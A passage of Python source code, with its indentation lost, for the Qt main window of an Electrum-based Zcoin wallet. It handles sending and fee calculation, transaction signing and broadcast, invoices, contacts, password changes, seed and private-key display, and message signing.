hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
w.setObjectName("send_container")
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Zcoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Zcoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
msgText = '\n'.join([
_("Your current server requires a higher fee to successfully propagate this transaction."),
_("It is recomended to raise your transaction fee or use a server with a lower relay fee."),
_("Try sending the transaction with the current fee?")
])
if not self.question(msgText):
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
l.setObjectName("addresses_container")
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
l.setObjectName("utxo_container")
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
l.setObjectName("contacts_container")
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
console.setObjectName("console_container")
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum_xzc': electrum_xzc,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setObjectName("main_window_balance")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
self.dash_net_button = StatusBarButton(read_QIcon('dash_net_0.png'), _("Dash Network"), lambda: self.gui_object.show_dash_net_dialog(self))
self.dash_net_button.hide()
self.update_dash_net_status_btn()
sb.addPermanentWidget(self.dash_net_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum_xzc.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Zcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Zcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
